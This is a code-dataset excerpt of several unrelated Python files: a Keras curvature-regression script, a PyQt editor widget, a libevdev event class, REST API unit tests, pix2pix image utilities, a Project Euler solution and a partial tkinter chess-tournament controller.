tensorflow.keras import layers\nfrom tqdm.keras import TqdmCallback\nfrom sklearn.preprocessing import MinMaxScaler\n\n# Enable full width output for numpy (https://stackoverflow.com/questions/43514106/python-terminal-output-width)\nnp.set_printoptions(suppress=True, linewidth=250, threshold=250)\n\ndef split_data(data, ratio):\n '''\n Create randomized train set and test set based on the ratio\n ---\n Input:\n data[pd df] data\n ratio[int] test:train ratio\n Output:\n testdata[pd df]\n traindata[pd df]\n '''\n # Generate random indices\n indices = np.random.permutation(len(data))\n # Calculate how many entries the test data will have\n test_size = int(len(data)*ratio)\n # Get the test indices from the randomly generated indices\n test_indices = indices[:test_size]\n # Get the train indices from the randomly generated indices\n train_indices = indices[test_size:]\n # Return the data corresponding to the indices\n return data.iloc[test_indices], data.iloc[train_indices]\n\n\ndef get_data(source):\n '''\n Import data from files\n ---\n Input:\n source[str] 'self' or 'paper'\n Output:\n data[pd df] data\n '''\n if source == 'self':\n data = pd.read_feather('data.feather')\n return data.copy()\n elif source == 'paper':\n csv_data = pd.read_csv('datafra.csv', names=['1', '2', '3', '4', '5', '6', '7', '8', '9']).reset_index()\n csv_labels = pd.read_csv('datacur.csv', names=['Curvature']).reset_index()\n data = csv_labels.merge(csv_data, on='index').drop(columns=['index'], axis=1)\n return data.copy()\n else:\n print('invalid from')\n\n\ndef build_model():\n # Build keras model\n model = tf.keras.Sequential([\n layers.Dense(120, activation='tanh', kernel_initializer='he_normal', input_shape=(9,)),\n layers.Dense(74, activation='tanh', kernel_initializer='he_normal'),\n layers.Dense(50, activation='tanh', kernel_initializer='he_normal'),\n layers.Dense(50, activation='tanh', kernel_initializer='he_normal'),\n layers.Dense(20, activation='tanh', kernel_initializer='he_normal'),\n layers.Dense(1, activation='linear')\n ])\n\n # Compile model\n model.compile(optimizer=tf.keras.optimizers.Adam(0.0004), loss='mse', metrics=['mae', 'mse'])\n return model\n\n\ndef train_model(model, train_data, train_labels, regenerate=True):\n # Build tensorflow dataset\n dataset = tf.data.Dataset.from_tensor_slices((train_data, train_labels)).batch(32)\n if regenerate:\n # Train Model\n # model.fit(train_data, train_labels, verbose=0, callbacks=[TqdmCallback(verbose=1)], epochs=1000, batch_size=8192, validation_split=0.2)\n early_stopping_callback = keras.callbacks.EarlyStopping(monitor='loss', min_delta=10e-8, patience=6, verbose=0, mode='auto', baseline=None)\n model.fit(dataset, verbose=0, callbacks=[TqdmCallback(verbose=1), early_stopping_callback], epochs=1000)\n\n # Save model\n model.save('model.h5')\n else:\n model = tf.keras.models.load_model('model.h5')\n print(model.summary())\n\n return model\n\n\ndef validate_model(model, train_data, train_labels):\n # Validate model\n train_predictions = model.predict(train_data, batch_size=64).flatten()\n\n plt.axes(aspect='equal')\n plt.scatter(train_labels, train_predictions, alpha=0.1)\n plt.xlabel('True Values [MPG]')\n plt.ylabel('Predictions [MPG]')\n lims = [-0.25, 0.25]\n plt.xlim(lims)\n plt.ylim(lims)\n _ = plt.plot(lims, lims)\n plt.show()\n\n\nif __name__ == '__main__':\n # Read data\n data = get_data('self')\n\n # data = data.iloc[30:40,:]\n # Normalize curvature\n # data['Curvature'] = data['Curvature']/data['Curvature'].max()\n # data['Curvature'] = np.log(data['Curvature'])\n\n # Split data\n test_set, train_set = split_data(data, 0.2)\n\n # Split the training and test data into labels (first column) and data\n test_labels = np.round(test_set.iloc[:, 0].to_numpy(), 3)\n test_data = np.round(test_set.iloc[:, 1:].to_numpy(), 3)\n train_labels = np.round([train_set.iloc[:, 0].to_numpy()], 3).T\n train_data = np.round(train_set.iloc[:, 1:].to_numpy(), 3)\n\n # scaler = MinMaxScaler()\n # train_labels = scaler.fit_transform(train_labels)\n # print(f'train_data: \\n{train_data}')\n # print(f'train_labels: \\n{train_labels}')\n # '''\n model = build_model()\n\n model = train_model(model, train_data, train_labels)\n\n validate_model(model, train_data, train_labels)\n # '''\n","sub_path":"Qi/ML.py","file_name":"ML.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"410904178","text":"from PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QWidget\n\nfrom installation import Installation\n\n\nclass EditorWidget(QWidget):\n def __init__(self, parent, ui_module, icon=\"\"):\n QWidget.__init__(self, parent)\n\n self.ui = ui_module.Ui_Form()\n self.ui.setupUi(self)\n\n self.icon = icon\n self.installation = self.window().active_installation\n self.file_path = \"\"\n self.res_ref = \"\"\n self.res_type = None\n\n def save_existing(self):\n raise NotImplementedError\n\n def save_to_path(self):\n raise NotImplementedError\n\n def save_to_module(self):\n raise NotImplementedError\n\n def setup(self, file_path, res_ref, res_type):\n file_tabs = self.window().ui.file_tabs\n file_tabs.addTab(self, res_ref + \".\" + res_type.extension)\n tab_index = -1\n for i in range(file_tabs.count()):\n if file_tabs.widget(i) == self:\n tab_index = i\n\n if self.installation is None:\n file_tabs.setTabIcon(tab_index, QIcon(\":/kx_icons/\" + self.icon))\n elif self.installation.is_tsl():\n file_tabs.setTabIcon(tab_index, QIcon(\":/k2_icons/\" + self.icon))\n else:\n file_tabs.setTabIcon(tab_index, QIcon(\":/k1_icons/\" + self.icon))\n\n installation_name = \"None\" if self.installation is None else self.installation.name\n file_tabs.setTabToolTip(tab_index, \"Path: \" + file_path + \"\\n\" +\n \"Resource: \" + res_ref + \".\" + res_type.extension + \"\\n\" +\n \"Installation: \" + installation_name)\n\n def load(self, some_data):\n raise NotImplementedError\n\n\n","sub_path":"widgets/editor_widget.py","file_name":"editor_widget.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"547025143","text":"# -*- coding: latin-1 -*-\n# Copyright © 2017 Red Hat, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice (including the next\n# paragraph) shall be included in all copies or substantial portions of the\n# Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nfrom .const import EventType, EventCode\n\n\nclass InputEvent(object):\n \"\"\"\n Represents one input event of type struct input_event as defined in\n ``linux/input.h`` and returned by ``libevdev_next_event()``.\n\n Comparison between events can be done via the :func:`matches()` function\n or by comparing two input events. Two events match when their most\n precise attribute match and all other attributes are None::\n\n >>> e = InputEvent(libevdev.EV_REL.REL_X, value=1)\n >>> e == InputEvent(libevdev.EV_REL)\n True\n >>> e == InputEvent(libevdev.EV_ABS)\n True\n >>> e == InputEvent(libevdev.EV_REL.REL_X)\n True\n >>> e == InputEvent(libevdev.EV_REL.REL_Y)\n False\n >>> e == InputEvent(libevdev.EV_REL.REL_X, value=1)\n True\n >>> e == InputEvent(libevdev.EV_REL.REL_X, value=2)\n False\n\n .. attribute:: code\n\n The :class:`EventCode` or :class:`EventType` for this input event\n\n .. attribute:: value\n\n The (optional) value for the event's axis\n\n .. attribute:: sec\n\n The timestamp, seconds\n\n .. attribute:: usec\n\n The timestamp, microseconds\n \"\"\"\n\n def __init__(self, code, value=None, sec=0, usec=0):\n assert isinstance(code, EventCode) or isinstance(code, EventType)\n\n if isinstance(code, EventCode):\n self._type = code.type\n self._code = code\n else:\n self._type = code\n self._code = None\n self.sec = sec\n self.usec = usec\n self.value = value\n\n @property\n def code(self):\n \"\"\"\n :return: the EventCode for this event or None\n :rtype: EventCode\n \"\"\"\n return self._code\n\n @property\n def type(self):\n \"\"\"\n :return: the event type for this event\n :rtype: EventType\n \"\"\"\n return self._type\n\n def matches(self, code, value=None):\n \"\"\"\n :param code: the event type or code\n :type code: EventType or EventCode\n :param value: optional, the event value\n :return: True if the type matches this event's type and this event's\n code matches the given code (if any) and this event's value\n matches the given value (if any)\n\n Check if an event matches a given event type and/or code. The\n following invocations show how to match on an event type, an event\n code and an event code with a specific value::\n\n\n if ev.matches(libevdev.EV_REL):\n pass\n\n if ev.matches(libevdev.EV_REL.REL_X):\n pass\n\n if ev.matches(libevdev.EV_REL.REL_X, 1):\n pass\n \"\"\"\n\n if value is not None and self.value is not None and self.value != value:\n return False\n\n if isinstance(code, EventType):\n return self._type == code\n else:\n return self._code == code\n\n def __eq__(self, other):\n if not isinstance(other, InputEvent):\n return False\n\n if self.code is None or other.code is None:\n return self.matches(other.type, other.value)\n\n return self.matches(other.code, other.value)\n\n def __repr__(self):\n tname = self.type.name\n cname = None\n if self.code is not None:\n cname = self.code.name\n return 'InputEvent({}, {}, {})'.format(tname, cname, self.value)\n","sub_path":"RG351P-M/Ubuntu OS Partition/usr/lib/python3/dist-packages/libevdev/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"52813640","text":"# -*- coding: UTF-8 -*-\nimport sys, os\nsys.path.append(os.path.abspath('../../..'))\nimport unittest\nfrom lib.restful_requests import *\nfrom lib.metadata_common_methods import MetadataCommonMethods\n\n# Set up global variables\n\nCONFIG_FILE = '../../../config/metadata_v1.conf'\nmetadata = MetadataCommonMethods(CONFIG_FILE)\nURL = metadata.conf.get_config('Basic', 'url')\nHEADERS = {'Content-Type': 'application/json'}\nSECTION = 'Attribute'\narguments = ['username']\n\n\nclass MetadataAttributeTest(unittest.TestCase):\n\n def setUp(self):\n # Initialize metadata_v1 object\n metadata.get_and_set(URL, SECTION, HEADERS, arguments)\n global items\n items = metadata.conf.get_all_items(SECTION)\n self.session = RestfulRequests()\n self.session.create_session(url=URL, headers=HEADERS)\n\n def test_get_db_attribute_list(self):\n uri = items['get_db_attribute_list_uri']\n response = self.session.get_request(uri=uri, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n return response\n\n def test_get_table_attribute_list(self):\n uri = items['get_table_attribute_list_uri']\n response = self.session.get_request(uri=uri, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n return response\n\n def test_get_column_attribute_list(self):\n uri = items['get_column_attribute_list_uri']\n response = self.session.get_request(uri=uri, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n return response\n\n def test_get_attribute_values_list(self):\n uri = items['get_attribute_values_list_uri']\n response = self.session.get_request(uri=uri, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n return response\n\n def test_post_attribute_values_list(self):\n get1_response = self.test_get_attribute_values_list()\n before_count = MetadataCommonMethods.get_content_count(get1_response)\n\n uri = items['post_attribute_values_list_uri']\n data = items['post_attribute_values_list_body']\n post_response = self.session.post_request(uri=uri, data=data, headers=HEADERS)\n self.assertEqual(post_response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (post_response.status_code, (URL+uri)))\n\n get2_response = self.test_get_attribute_values_list()\n after_count = MetadataCommonMethods.get_content_count(get2_response)\n\n self.assertEqual(after_count,int(before_count+1))\n return post_response\n\n def test_put_attribute_values_list(self):\n post_response = self.test_post_attribute_values_list()\n vid = json.loads(post_response.content)[-1]['id']\n metadata.conf.set_config(SECTION, 'vid', vid)\n items = metadata.conf.get_all_items(SECTION)\n\n uri = items['put_attribute_values_list_uri']\n data = items['put_attribute_values_list_body']\n response = self.session.put_request(uri=uri, data=data, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n content_object = json.loads(response.content)[0]\n self.assertEqual(content_object['id'], vid)\n self.assertEqual(content_object['name'], u'测试域更新')\n return response\n\n def test_soft_delete_attribute_values_list(self):\n post_response = self.test_post_attribute_values_list()\n vid = json.loads(post_response.content)[-1]['id']\n metadata.conf.set_config(SECTION, 'vid', vid)\n items = metadata.conf.get_all_items(SECTION)\n\n uri = items['soft_delete_attribute_values_list_uri']\n data = items['soft_delete_attribute_values_list_body']\n response = self.session.delete_request(uri=uri, data=data, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL + uri)))\n self.assertEqual(response.content, \"success\")\n return response\n\n def test_hard_delete_attribute_values_list(self):\n post_response = self.test_post_attribute_values_list()\n vid = json.loads(post_response.content)[-1]['id']\n metadata.conf.set_config(SECTION, 'vid', vid)\n items = metadata.conf.get_all_items(SECTION)\n\n uri = items['hard_delete_attribute_values_list_uri']\n response = self.session.delete_request(uri=uri, data=None, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL + uri)))\n self.assertEqual(response.content, \"success\")\n return response\n\n def tearDown(self):\n self.session.delete_session()\n\nif __name__ == \"__main__\":\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(MetadataCommonMethods))\n runner = unittest.TextTestRunner()\n runner.run(suite)","sub_path":"testcases/dp_api/metadata_v1/test_attribute.py","file_name":"test_attribute.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"552392292","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n\ndef imread(idx):\n \"\"\"\n Utility to read image in RGB format, split into two halves and normalize\n Parameters:\n path: type:list. Path to the image to be loaded\n Returns:\n A tuple consisting of two halves of the input image\n \"\"\"\n img_tgt = plt.imread(\"data/landmarks/\"+idx, format='RGB').astype(np.float)\n img_src = plt.imread(\"data/original/\"+idx, format='RGB').astype(np.float)\n return (img_src/127.5)-1, (img_tgt/127.5)-1\n\n\ndef _get_images(image_list, img_res=[256, 256], is_testing=False):\n \"\"\"\n Utility to process a list of images, resize and randomly perform\n horizontal flips\n Parameters:\n image_path_list: type:list. List of paths of images to be processed\n image_res: type:int list. Array denoting the resized [H,W] of image\n is_testing: type: bool. Flag to control random flipping\n Returns:\n A tuple of two lists (source, target)\n \"\"\"\n imgs_source = []\n imgs_target = []\n for img_path in image_list:\n img_src, img_tgt = imread(img_path)\n img_src = tf.image.resize(img_src, img_res).numpy()\n img_tgt = tf.image.resize(img_tgt, img_res).numpy()\n\n # Flip random images horizontally during training\n if not is_testing and np.random.random() < 0.5:\n img_src = np.fliplr(img_src)\n img_tgt = np.fliplr(img_tgt)\n\n imgs_source.append(img_src)\n imgs_target.append(img_tgt)\n imgs_source = np.array(imgs_source)\n imgs_target = np.array(imgs_target)\n\n return imgs_source, imgs_target\n\n\ndef get_samples(path, batch_size=1, img_res=[256, 256], is_testing=False):\n \"\"\"\n Method to get a random sample of images\n Parameters:\n path: type:str. Path to the dataset\n batch_size: type:int. Number of images required\n image_res: type:int list. Array denoting the resized [H,W] of image\n is_testing: type: bool. Flag to control random flipping\n Returns:\n A tuple of two lists (source, target) with randomly sampled images\n \"\"\"\n path = os.listdir(path+\"/original\")\n\n random_sample = np.random.choice(path, size=batch_size)\n return _get_images(random_sample, img_res, is_testing)\n\n\ndef batch_generator(path, batch_size=1, img_res=[256, 256], is_testing=False):\n \"\"\"\n Method to generate batch of images\n Parameters:\n path: type:str. Path to the dataset\n batch_size: type:int. Number of images required\n image_res: type:int list. Array denoting the resized [H,W] of image\n is_testing: type: bool. Flag to control random flipping\n Returns:\n yields a tuple of two lists (source,target)\n \"\"\"\n path = os.listdir(path+\"/original\")\n\n num_batches = int(len(path) / batch_size)\n for i in range(num_batches-1):\n batch = path[i*batch_size:(i+1)*batch_size]\n imgs_source, imgs_target = _get_images(batch, img_res, is_testing)\n yield imgs_source, imgs_target\n\n\ndef plot_sample_images(generator,\n path,\n epoch=0,\n batch_num=1,\n output_dir='maps'):\n \"\"\"\n Method to plot sample outputs from generator\n Parameters:\n generator: type:keras model object. Generator model\n path: type:str. Path to dataset\n epoch: type:int. Epoch number, used for output file name\n batch_num: type:int. Batch number, used for output file name\n output_dir: type:str. Path to save generated output samples\n Returns:\n None\n \"\"\"\n\n imgs_source, imgs_target = get_samples(path,\n batch_size=3,\n img_res=[256, 256],\n is_testing=True)\n fake_imgs = generator.predict(imgs_target)\n\n gen_imgs = np.concatenate([imgs_target, fake_imgs, imgs_source])\n\n # scale images 0 - 1\n gen_imgs = 0.5 * gen_imgs + 0.5\n\n os.makedirs(output_dir, exist_ok=True)\n\n titles = ['Condition', 'Generated', 'Original']\n rows, cols = 3, 3\n fig, axs = plt.subplots(rows, cols)\n cnt = 0\n for i in range(rows):\n for j in range(cols):\n axs[i, j].imshow(gen_imgs[cnt])\n axs[i, j].set_title(titles[i])\n axs[i, j].axis('off')\n cnt += 1\n fig.savefig(\"{}/{}_{}.png\".format(output_dir, epoch, batch_num))\n plt.show()\n plt.close()\n","sub_path":"Chapter_8/reenactment_pix2pix/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"538699220","text":"from pe_nominal_record import NominalRecord\n\ndef answer():\n \n nr = NominalRecord.from_int(10)\n s = 0\n for x in range(10, 9**5 * 6):\n if sum(d**5 for d in nr) == x:\n s += x\n nr[-1] += 1\n nr.normalise()\n return s\n \nif __name__ == '__main__':\n print(answer())\n","sub_path":"OLD_PY_CODE/project_euler_py/pe0030.py","file_name":"pe0030.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"37111006","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo\nfrom typing import List\n\nfrom views.view import View\nfrom models.tournament import Tournament, Tour\nfrom models.players import Player\nfrom models.dataBase import data_base\n\nclass Controller:\n \"\"\"Main controller\"\"\"\n\n def __init__(self):\n self.trounament: List[Tournament] = []\n self.players: List[Player] = []\n self.rounds: List[Tour] = []\n self.tournament_name = []\n self.counter = 0\n\n \"\"\"This section is dedicated fro the building of the round objects:\n it is made by xxxxxx function\n \"\"\"\n #round general data view model\n def create_round_data_view(self, round_name, data: List, command):\n player_full_name = data\n self.label_entry_list = []\n self.round = Tour(round_name)\n\n # remove the previous frame\n self.new_frame.destroy()\n\n # trounament data frame\n self.new_frame = self.view.create_frame(self.view.root, round_name, 600, 400, 1, 0)\n\n # creation of match frame\n match_frame_list = self.round.creating_match_list()\n for i in range(4):\n match_frame_list[i] = self.view.create_frame(self.new_frame, \"match {}\".format(i + 1), 600, 100, 1, i)\n\n # creation of match bracket :\n # creation of label_entry variable\n for i in range(4):\n self.label_entry_list.append(\"match_{}_player_1\".format(i + 1))\n self.label_entry_list.append(\"match_{}_player_2\".format(i + 1))\n\n # insertion of the match bracket\n i = 0 # counter used to display the match variable name. it will increase by 2 for each iteration\n j = 0 # counter used to display the player variable name. it will increase by 1 for each iteration\n\n if round_name == \"Round_1\":\n step = 4 #for round 1 player n plays against player n+4( step = 4)\n j_increment = 1\n else:\n step = 1 #for round 2, 3, 4 player n plays against player n+1( step = 1)\n j_increment = 2\n print(\"step is :\", step)\n print(player_full_name)\n for match in match_frame_list:\n self.label_entry_list[i] = self.view.create_entry(match, player_full_name[j][0] , NORMAL, 10, 10)\n self.label_entry_list[i+1] = self.view.create_entry(match, player_full_name[j+step][0] , NORMAL, 10, 40)\n i += 2\n j += j_increment\n\n # button\n self.results_round_data = self.view.create_button(match_frame_list[3], \"Enregister les resultats\", 430, 40)\n self.results_round_data.configure(command= command )\n return self.round\n\n def getting_round_data(self):\n self.getted_round_data = [] #data that will be used to sum the score\n\n j = 0\n for i in range (4):\n score_player_1 = float(self.label_entry_list[j][1].get())\n score_player_2 = float(self.label_entry_list[j+1][1].get())\n if score_player_1 + score_player_2 != 1:\n showinfo(\"verfier le resultats svp!\")\n else:\n self.round.match_result.append( ([self.label_entry_list[j][0][\"text\"],score_player_1],\n [self.label_entry_list[j+1][0][\"text\"],score_player_2]))\n j += 2\n print(self.round.match_result)\n self.rounds.append(self.round)\n print(\"round saved data\", self.round.__dict__)\n return self.rounds\n\n\n #create a tournoi report\n def tournois_data_view(self):\n columnlist = ['tournois name', 'tounois place', 'tournois date', 'tour number']\n self.new_frame.destroy()\n self.new_frame = self.view.create_frame(self.view.root, \"rapport\", 600, 400, 1, 0)\n data =[]\n for tournament in self.trounament:\n #retrive attrebute of tournament object\n list = tournament.__dict__\n intermidate_data = []\n for key,var in list.items():\n intermidate_data.append(var)\n del intermidate_data[-1]\n data.append(intermidate_data)\n\n self.treeviews_tournois_data = self.view.create_treeview(self.new_frame, data, columnlist, 10, 10)\n\n # create a player report\n def players_data_view(self):\n columnlist = ['first name', 'last name', 'birthday', 'gender', 'score']\n self.new_frame.destroy()\n self.new_frame = self.view.create_frame(self.view.root, \"rapport\", 600, 400, 1, 0)\n data =[]\n for player in self.players:\n #retrive attrebute of tournament object\n list = player.__dict__\n intermidate_data = []\n for key,var in list.items():\n intermidate_data.append(var)\n\n data.append(intermidate_data)\n\n self.treeviews_tournois_data = self.view.create_treeview(self.new_frame, data, columnlist, 10, 10)\n\n #creating round report\n def round_data_view(self):\n \"\"\"columnlist = ['match name', 'player 1', 'score', 'player 2', 'score']\n self.new_frame.destroy()\n self.new_frame = self.view.create_frame(self.view.root, \"rapport\", 600, 400, 1, 0)\n data =[]\n for match in self.rounds:\n #retrive attrebute of tournament object\n list = match.get_player_round_resutl()\n intermidate_data = []\n for result in list:\n intermidate_data.append(result[0])\n intermidate_data.append(result[1])\n\n data.append(intermidate_data)\n\n self.treeviews_tournois_data = self.view.create_treeview(self.new_frame, data, columnlist, 10, 10)\"\"\"\n pass\n\n\n def sort_players_results(self):\n #gothering data\n \"#\"\n self.getting_round_data()\n\n lastround = self.rounds[-1]\n # sum the new results with the old one\n self.last_player_round_result = self.rounds[-1].get_player_round_resutl()\n if lastround.tour_name == \"Round_1\":\n pass\n\n else :\n for player_round in self.last_player_round_result:\n #print(player_round)\n for i in range(len(self.rounds)-1):\n for item in self.rounds[i].get_player_round_resutl():\n if player_round[0] == item[0]:\n player_round[1] += item[1]\n\n #added to each player his international rate in order to use it as second way for sorting\n for result in self.last_player_round_result:\n for ref_player in self.reference_data:\n if ref_player[0] == result[0]:\n result.append(ref_player[1])\n\n break\n\n # sorted list based on rate value and socre\n self.last_player_round_result = sorted(self.last_player_round_result,\n key=lambda x: (x[0][1], x[1]), reverse=True)\n\n # remove rate value and return list of tuple (player name, score)\n for item in self.last_player_round_result:\n item.pop(2)\n #remove the previous add result\n if lastround.tour_name == \"Round_1\":\n pass\n\n else :\n for player_round in self.last_player_round_result:\n #print(player_round)\n for i in range(len(self.rounds)-1):\n for item in self.rounds[i].get_player_round_resutl():\n if player_round[0] == item[0]:\n player_round[1] -= item[1]\n\n\n\n\n return self.last_player_round_result\n\n #creating player bracket based on the previous match list\n def creating_round_bracket(self):\n #merged all match in the same list in order to be used for the ckeck during bracket setting\n match_list_data = []\n self.bracket_for_next_round = []\n for round in self.rounds:\n print(\"round match results:\", round.match_result)\n for match in round.match_result:\n print(\"match: \", match)\n match_list_data.append((match[0][0],match[1][0]))\n print(\"*****************************************match list**********************\")\n print(match_list_data)\n\n #creating bracket\n data = self.last_player_round_result\n while len(data) !=0:\n print(len(data))\n for i in range(len(data)-1):\n player_1 = data[0]\n player_2 = data [i+1]\n bracket = (player_1[0],player_2[0])\n print(bracket)\n if not bracket in match_list_data:\n self.bracket_for_next_round.append(player_1)\n self.bracket_for_next_round.append(player_2)\n print(data)\n data.remove(player_1)\n data.remove(player_2)\n print(data)\n break\n print(data)\n\n return self.bracket_for_next_round\n\n #sortted round 4 results\n def tournament_final_result(self):\n self.sort_players_results()\n lastround = self.rounds[-1]\n # sum the new results with the old one\n last_player_round_result = self.rounds[-1].get_player_round_resutl()\n\n print(\"****************************************************************************************\")\n print(\"***************************************analyse of result********************************\")\n for round_item in self.rounds:\n\n print(\"number of round:\", len(self.rounds))\n print(\"result of {} : \".format(round_item.tour_name),round_item.get_player_round_resutl())\n print(\"match reseults:\", round_item.match_result)\n\n print(\"***************************************fin des result***********************************\")\n print(\"****************************************************************************************\")\n\n for player_round in last_player_round_result:\n # print(player_round)\n for i in range(len(self.rounds) - 1):\n for item in self.rounds[i].get_player_round_resutl():\n if player_round[0] == item[0]:\n player_round[1] += item[1]\n last_player_round_result = sorted(last_player_round_result,\n key=lambda x: (x[0][1], x[1]), reverse=True)\n print(\"****************************************************************************************\")\n print(\"******************************cumul de result*******************************************\")\n print(last_player_round_result)\n # trounament report button\n tounois_list_button = self.view.create_button(self.menu_frame, \"Tounois_list\", 20, 110)\n tounois_list_button.configure(command=lambda: self.tournois_data_view())\n\n # player report button\n player_list_button = self.view.create_button(self.menu_frame, \"Player_list\", 20, 140)\n player_list_button.configure(command=lambda: self.players_data_view())\n\n # round report button\n round_list_button = self.view.create_button(self.menu_frame, \"tour_list\", 20, 170)\n round_list_button.configure(command=lambda: self.round_data_view())\n\n #create round 4\n def round_4_data_view(self):\n print(\"#################################_Round_4#######################################################\")\n self.sort_players_results()\n self.create_round_data_view(\"Round_4\", self.creating_round_bracket(), self.tournament_final_result)\n\n #create round 3\n def round_3_data_view(self):\n print(\"#################################_Round_3#######################################################\")\n self.sort_players_results()\n self.create_round_data_view(\"Round_3\", self.creating_round_bracket(), self.round_4_data_view)\n\n #create round 2\n def round_2_data_view(self):\n print(\"#################################_Round_2#######################################################\")\n self.sort_players_results()\n self.create_round_data_view(\"Round_2\", self.creating_round_bracket(), self.round_3_data_view)\n\n \"\"\"\n self.getting_round_data()\n self.sorted_data_round_1 = self.rounds[0].sorting_round_data(self.reference_data)\n # instruction code for check. will be removed at the last version\n print(self.sorted_data_round_1)\n self.results_bracket_round_1 = self.rounds[0].creating_round_bracket()\n print(self.results_bracket_round_1)\n self.create_round_data_view(\"Round_2\", self.results_bracket_round_1, self.round_3_data_view)\"\"\"\n\n #create round 1\n def round_1_data_view(self):\n print(\"#################################_Round_1#######################################################\")\n # generate sample data\n self.players = sorted(self.players, key=lambda x: ( -x.rate ,x.first_name))\n self.reference_data = []\n for player in self.players:\n self.reference_data.append([str(player.first_name + \" \" + player.last_name), player.rate])\n # instruction code for check. will be removed at the last version\n print(self.players)\n print(self.reference_data)\n\n self.create_round_data_view(\"Round_1\", self.reference_data, self.round_2_data_view)\n\n \"\"\"This section is dedicated fro the building of the players objects:\n it is made by three function\n The first one is needed to select tournament and enable the function for the entry box.\n The second one is dedicated for the display of the entry box\n The thrid one is used to create player object by getting entry data and added it to the player list\"\"\"\n\n #creating player object\n def creating_player(self):\n first_name = self.first_name[1].get()\n last_name = self.last_name[1].get()\n birthday_date = self.birthday_date[1].get()\n gender = self.gender.get()\n rate_isnot_integer = True\n rate = self.rate[1].get()\n\n #check empty field\n if first_name == '' or last_name == '' or birthday_date == '' or gender == 'None' or rate == '' or type(rate) != int:\n value = False\n else :\n value = True\n if value:\n player = Player(first_name, last_name, birthday_date, gender, rate)\n self.players.append(player)\n print(\"attribute of player:\", player.__dict__ )\n\n showinfo(\"\",\"Player data has been saved\")\n self.first_name[1].delete(0, 'end')\n self.last_name[1].delete(0, 'end')\n self.birthday_date[1].delete(0, 'end')\n self.gender.set(None)\n self.rate[1].delete(0, 'end')\n else:\n if first_name == '' or last_name == '' or birthday_date == '' or gender == 'None' or rate == '':\n showinfo(message='fields are empty')\n else:\n showinfo(message='score should be an integer')\n\n if len(self.players) >= 8:\n showinfo(\"message\",\"Le nombre maximal est attend./\"\n \" cliquer sur le bottom tour pour genere les pair de partie\")\n self.save_player_data.configure(state=DISABLED)\n round_button = self.view.create_button(self.menu_frame, \"tours\", 20, 80)\n round_button.configure(command=lambda: self.round_1_data_view())\n\n if len(self.players) == 8:\n for player in self.players :\n self.plyers_db_table.insert(player.toJson())\n print(player.toJson())\n\n # creaetion of player entry of a selected tournament\n def player_data_entry(self, event=None):\n message = ttk.Label(self.new_frame, text=\"Donneés d'identificaton du joueur\")\n message.place(x=20, y=70)\n # tournament data field\n\n self.first_name = self.view.create_entry(self.new_frame, \"Prenom: \", NORMAL, 50, 120)\n self.last_name = self.view.create_entry(self.new_frame, \"Nom de famille: \", NORMAL, 50, 160)\n self.birthday_date = self.view.create_entry(self.new_frame, \"Date de naissance\", NORMAL,50, 200)\n self.gender = self.view.create_radiobutton(self.new_frame, \"genre\", 50, 240)\n self.rate = self.view.create_entry(self.new_frame, \"cote Elo\", NORMAL, 50, 280)\n\n # button\n self.save_player_data = self.view.create_button(self.new_frame, \"Enregister les donneés du joueur\",375, 330)\n self.save_player_data.configure(command=lambda: self.creating_player())\n\n # creation of player data view\n def create_player_data_view(self, ):\n # remove the previous\n self.new_frame.destroy()\n # trounament data frame\n self.new_frame = self.view.create_frame(self.view.root,\"Joueurs\", 600, 400, 1, 0)\n #tournament data name comboboc\n tournament_labelframe = self.view.create_combobox(self.new_frame,\n \"selectionner le tournois:\",\n self.tournament_name, 20, 20, )\n 